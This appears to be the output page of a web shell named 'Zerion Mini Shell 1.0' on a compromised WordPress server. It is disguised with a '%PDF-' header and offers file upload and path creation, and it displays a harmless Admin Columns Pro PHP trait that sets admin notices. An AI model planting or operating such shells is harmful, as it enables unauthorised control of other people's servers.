%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/knwn/wp-content/plugins/admin-columns-pro/classes/Migrate/
Upload File :
Create Path :
Current File : /var/www/knwn/wp-content/plugins/admin-columns-pro/classes/Migrate/MessageTrait.php

<?php

namespace ACP\Migrate;

use AC\Message;

trait MessageTrait {

	/**
	 * @param string      $message
	 * @param string|null $type
	 */
	protected function set_message( $message, $type = null ) {
		if ( null === $type ) {
			$type = Message::ERROR;
		}

		$notice = new Message\Notice( $message );
		$notice->set_type( $type )
		       ->register();
	}

}

Zerion Mini Shell 1.0